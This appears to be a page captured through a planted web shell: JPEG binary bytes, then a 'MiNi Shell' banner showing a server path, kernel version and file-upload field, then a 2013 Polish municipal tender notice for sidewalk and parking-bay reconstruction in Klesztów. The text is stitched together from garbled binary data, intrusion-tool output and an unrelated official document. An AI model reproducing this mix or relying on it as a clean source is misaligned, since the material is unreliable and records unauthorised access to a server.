JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130206/50132-N-2013.html

<p class="kh_header"><b>Żmudź: Odnowa centrum miejscowości Klesztów poprzez przebudowę chodników i zatok</b><br>
<b>Numer ogłoszenia: 50132 - 2013; data zamieszczenia: 06.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żmudź , Żmudź 2, 22-114 Żmudź, woj. lubelskie, tel. 082 5680182, faks 082 5680620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zmudz.gmina.pl, www.ugzmudz.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowa centrum miejscowości Klesztów poprzez przebudowę chodników i zatok.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Niniejszy przedmiot zamówienia obejmuje przebudowę istniejących chodników    
     w miejscowości Klesztów gm. Żmudź, po obydwu stronach drogi powiatowej    
     nr 1849L relacji Klesztów-Roztoka na odcinku 800,0 m  wraz ze zjazdami do 
     posesji, a także  przebudowę trzech zatok parkingowych: 
-	po lewej stronie drogi pow. nr 1849 L Klesztów - Roztoka od km 0+230 do km 0+245 
-	po lewej stronie drogi pow. nr 1848L  Klesztów- Andrzejów od km 0+018 do km 0+053, . 
-	po prawej stronie drogi powiatowej nr 1849L w km od 0+305 do km 0+324.
    1. Zakres przebudowy chodników jest  następujący:
	rozbiórka istniejących chodników z płytek betonowych i obrzeży betonowych z wykorzystaniem ich do konstrukcji podbudowy pod nawierzchnię z kostki betonowej.                                                                                                    -rozbiórka istniejących krawężników betonowych i ponowne ich wbudowanie na podbudowy na zjazdach i zatokach parkingowych,
	wykonanie koryta 394,79 m3,
	wykonanie warstwy odsączającej z piasku
	ułożenie nowego krawężnika betonowego wibroprasowanego na ławie betonowej z oporem,
	ułożenie nowych obrzeży betonowych,
	wykonanie podbudowy z płytek chodnikowych i obrzeży z rozbiórki,
	wykonanie nowej nawierzchni chodników z kostki brukowej betonowej gr 6 cm w kolorze szarym w ilości 2482,47 m2.
      Konstrukcja chodników.
 Przyjęto konstrukcję nawierzchni o następującym układzie warstw:
	6 cm + 4 cm - warstwa ścieralna z kostki brukowej wibroprasowanej szarej  , na podsypce cementowo piaskowej  w stosunku 1:4,
	10 cm - podbudowa z płytek betonowych 35x35x5 i obrzeży betonowych 20x6 (z odzysku) z uzupełnieniem 50 % gruntocementem z wytwórni  wytrzymałości Rm=2,5 MPa
	 5 cm - warstwa odsączająca z piasku 
	obramowanie od strony jezdni krawężnikiem betonowym wibroprasowanym o wymiarach 15x30x100 na ławie betonowej z oporem z betonu B15, oraz od strony posesji obrzeżem betonowym wibroprasowanym o wymiarach 20x6x100 cm,
	cieki poprzeczne podchodnikowe z elementów prefabrykowanych 50x60 cm ułożonych podwójnie na podsypce cementowo piaskowej grubości 10 cm i stosunku 1:4,Spadek poprzeczny chodników wynosi 2% w kierunku jezdni.
	wykonanie ścieków podchodnikowych z elementów prefabrykowanych.
2. Zakres wykonania zjazdów indywidualnych do posesji i publicznych na drogi do gruntów rolnych jest następujący:
	rozbiórka istniejących krawężników,
	rozbiórka istniejącej nawierzchni z płyt drogowych betonowych,
	wykonanie koryta,
	wykonanie warstwy odsączającej z piasku
	ułożenie nowego krawężnika betonowego wibroprasowanego na ławie betonowej z oporem przy zjazdach publicznych,
	ułożenie krawężników z odzysku do wykonania podbudowy wraz z uzupełnieniem gruntocementem z wytwórni,
	wykonanie nowej nawierzchni z kostki brukowej betonowej gr 8 cm w kolorze grafitowym w ilości 796,23 m2.
Dla zjazdów  przyjęto konstrukcję nawierzchni o następującym układzie            warstw:
	8 cm + 4 cm - warstwa ścieralna z kostki brukowej wibroprasowanej w kolorze grafitowym , na podsypce cementowo piaskowej  w stosunku 1:4,
	15 cm - podbudowa z krawężników z odzysku z uzupełnieniem podbudowy w ilości 50 % gruntocementem z wytwórni o wytrzymałości Rm = 5,0 MPa,
	15 cm - warstwa odsączająca z piasku 
	obramowanie poprzeczne zjazdów od strony granicy pasa drogowego obrzeżem betonowym o wymiarach 8x30x100 na ławie betonowej z oporem z  betonu B15 
	obramowanie poprzeczne zjazdów od strony jezdni krawężnikiem betonowym wibroprasowanym o wymiarach 15x30x100 na ławie betonowej z oporem z betonu B15, obniżonym do 3,0 cm w stosunku do poziomu jezdni. Spadek podłużny zjazdu w kierunku jezdni.
3.Zakres wykonania zatok parkingowych obejmuje :
-	wykonanie koryta
-	wykonanie warstwy odsączającej z piasku
	ułożenie nowego krawężnika betonowego wibroprasowanego na ławie betonowej z oporem przy zjazdach publicznych,
	ułożenie krawężników z odzysku do wykonania podbudowy wraz z uzupełnieniem gruntocementem z wytwórni,
	wykonanie nowej nawierzchni z kostki brukowej betonowej gr. 8 cm w kolorze grafitowym w ilości 364 m2.
Do projektowanych  zatok parkingowych przyjęto konstrukcję    nawierzchni o następującym układzie warstw:
	8 cm + 4 cm - warstwa ścieralna z kostki brukowej wibroprasowanej    w kolorze grafitowym, na podsypce cementowo piaskowej  w stosunku 1:4,
	15 cm podbudowa z krawężników z odzysku z uzupełnieniem podbudowy w ilości 50,0 % gruntocementem z wytwórni o wytrzymałości Rm = 5,0 MPa,
	10 cm wzmocnienie podłoża  z piasku stabilizowanego cementem o Rm= 2,5 MPa, z wytwórni 
	15 cm warstwa odsącząjąca z piasku stabilizowanego mechanicznie
           obramowanie zatok krawężnikiem od strony  granicy pasa drogowego  
           krawężnikiem betonowym  15x30x100 na ławie betonowej
  4 .  Odwodnienie.
Chodnik do przebudowy posiada spadek poprzeczny do jezdni, natomiast spadek podłużny dostosowany jest do spadku podłużnego istniejącej jezdni. Odwodnienie  skrzyżowania  dróg powiatowych  zaprojektowano poprzez oczyszczenie i wyremontowanie  przepustu z rur betonowych  75,0 cm (wymiana uszkodzonych kręgów). Odprowadzenie wód opadowych z przepustu nastąpi do rowu  o długości 95 m,  wymagającego oczyszczenia z namułu.
Zaprojektowano budowę dwóch studzienek rewizyjnych z kręgów żelbetowych  120 cm, z włazem żeliwnym o nośności 45 t, na istniejącym przepuście, oraz trzech wpustów deszczowych z kręgów betonowych o  50,0 cm z przyłączeniem do studzienek rewizyjnych rurą z PCV  20,0 cm. 
Rzędne wysokościowe wpustów deszczowych:
po lewej stronie  drogi :
-	k1 = 188,72 m z przyłączem  20cm o l=16,00 m
-	k2  = 188,63 m z przyłączem  20cm o l =3,00 m
po prawej stronie drogi :
-	k3   = 188,61m z przyłączem o  20 cm o l= 4,0 m
Przewidziano odwodnienie jezdni przez wbudowanie  10 ścieków poprzecznych pochodnikowych, z elementów betonowych prefabrykowanych o wym. 50x60x15 cm ułożonych podwójnie zgodnie z następującą lokalizacją  w km :
   Strona lewa:	    Strona prawa
-	0+065 L
-	0+170 L
-	0+360 L
-	0+480 L
-	0+600 L
-	0+700 L	-	0+051 P
-	0+538 P
-	0+672 P
-	0+755 P,
a także budowę podłużnego cieku odwadniającego z betonowych elementów prefabrykowanych, o długości 40,0 m, na odcinku od km 0+310 do km 0+350, z lewej strony drogi powiatowej nr 1849L.
5.  Roboty wykończeniowe.
Teren i skarpy przyległe do obrzeży od strony posesji należy wyprofilować do  uzyskania prawidłowych spadków oraz obsiać trawą.
Przed przystąpieniem do robót ziemnych należy bezwzględnie zapoznać się z uzgodnieniami branżowymi i przestrzegać zawartych w nich zaleceń.
6. Szczegółowy zakres robót objętych zamówieniem określają: 
a)	opis techniczny, plan sytuacyjny, przekroje, specyfikacja techniczna, przedmiar robót.                                                                                                                                                                                                          Wszystkie roboty powinny być  realizowane zgodnie z obowiązującymi przepisami  prawnymi  oraz dokumentacją zgłoszeniową i przedmiarem robót.

7. Do obowiązków wykonawcy należy:

a)  Obsługa geodezyjna w czasie budowy. 
b)  Inwentaryzacja geodezyjna powykonawcza dla terenu objętego inwestycją               

8. Wymagania jakościowe i materiałowe: 
a) Do wykonania zamówienia Wykonawcy zobowiązani są użyć materiałów i      urządzeń zakupionych u producentów, gwarantujących najwyższą jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w dokumentacji projektowej, przedmiarze robót i specyfikacji technicznej, 
b) Występujące w dokumentacji i przedmiarach nazwy, typy i pochodzenie produktów nie są dla Wykonawcy wiążące. 
c) Zamawiający dopuszcza możliwość składania ofert z użyciem materiałów równoważnych, do materiałów określonych w dokumentacji przetargowej, pod warunkiem, że ich parametry będą odpowiadały technologii i parametrom określonym w dokumentacji, 
       d) Zabrania się stosowania materiałów nie odpowiadających wymaganiom Polskiej  Normy oraz innym określonym w projekcie. Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenia na ich zastosowanie/wbudowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości) i dostarczyć zamawiającemu po wbudowaniu, 
e) Wykonawca ponosi odpowiedzialność za szkody, kradzieże i inne uszkodzenia materiałów i urządzeń. 

Rozwiązania równoważne: wszystkie wskazania z nazwy materiałów i urządzeń występujące w dokumentacji projektowej należy rozumieć, jako określenie wymaganych minimalnych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ust.3 ustawy Prawo zamówień publicznych wskazaniom tym towarzyszą wyrazy /lub równoważne/. Wykonawca, który w ofercie powoła się na zastosowanie rozwiązań równoważnych opisanych w specyfikacji istotnych warunków zamówienia, jest obowiązany wykazać, że oferowane materiały i urządzenia spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość zamówień uzupełniających w wysokości nie większej niż 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.31.61-5, 45.23.32.60-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku posiadania niezbędnego doświadczenia zamawiający uzna wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zamówienia na roboty budowlane polegające na ułożeniu nawierzchni z kostki brukowej o powierzchni nie mniejszej niż 2500,00 m2 każde i wartości nie mniejszej niż 400 000,00 PLN brutto każde.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem innych podmiotów,  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ocena spełnienia przedstawionego powyżej warunku zostanie dokonana wg formuły /spełnia - nie spełnia/ na podstawie wymaganych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonywania zamówienia Zamawiający uzna dysponowanie osobami posiadającymi uprawnienia w zakresie:
kierownik budowy posiadający:
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów;
-	co najmniej 5 lat doświadczenia zawodowego w wykonawstwie lub nadzorze robót w ramach posiadanych uprawnień, w tym co najmniej jednej inwestycji o wartości brutto robót budowlanych nie mniejszej niż 200 000,00. PLN  w skład której wchodziła ułożenie nawierzchni z kostki brukowej.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: /spełnia - nie spełnia/ na podstawie wymaganych dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej   
    Zamawiający uzna:
 posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum   400 000,00 PLN .
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: /spełnia - nie spełnia/ na podstawie wymaganych dokumentów i oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony formular zoferty o treści zgodnej z określoną we wzorze, stanowiący załącznik Nr 1 do SIWZ oraz formularz rozliczeniowy,załącznik Nr 1.1,
b) uproszczony kosztorys ofertowy zgodny z załączonym przedmiarem robót</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust 1 ustawy Pzp Zamawiający przewiduje możliwość   dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
-    zmiany terminu umowy,
-	zmiany ustawowej stawki podatku VAT - jej obniżenie lub podwyższenie jest możliwe w wysokości odpowiadającej zmianie podatku;
-    konieczność dokonywania zmiany   wykonania elementów robót w przypadku, gdy wprowadzone rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego jakie przewiduje projekt, w takim przypadku wykonawca przedstawia projekt zamienny czyli opis zmian z rysunkami, zaakceptowanych przez autora projektu i przez zamawiającego- wprowadzone zmiany muszą być zgodne z obowiązującymi  przepisami prawa i pozwolą osiągnąć cel operacji.
-	rozliczenie wynikające z obmiarów wykonanych robót,
-	obniżenie kosztów wykonanych robót , a tym samym wynagrodzenia wykonawcy,
-	zmiana osób przy pomocy których wykonawca realizuje przedmiot umowy, na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami.
-	konieczność zaniechania robót budowlanych z uwagi na wystąpienie obiektywnych przyczyn technicznych uniemożliwiających ich wykonanie.

        Wykonawca przygotuje i przekaże dokumentację powykonawczą, na której  mogą być naniesione wszystkie zmiany w trakcie budowy oraz  sporządzi kosztorys powykonawczy ( różnicowy) w porównaniu do ofertowego.

Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę, ale nie stanowią zobowiązań Zamawiającego do ich wprowadzenia. Pozostałe postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik Nr 7 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zmudz.gmina.pl, www.ugzmudz.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żmudź
Żmudź 2
22-114 Żmudź
Pok. Nr 4 Krakowiak Teresa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 11:00, miejsce: Urząd Gminy Żmudź
Żmudź 2
22-114 Żmudź
Pok. Nr 1 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
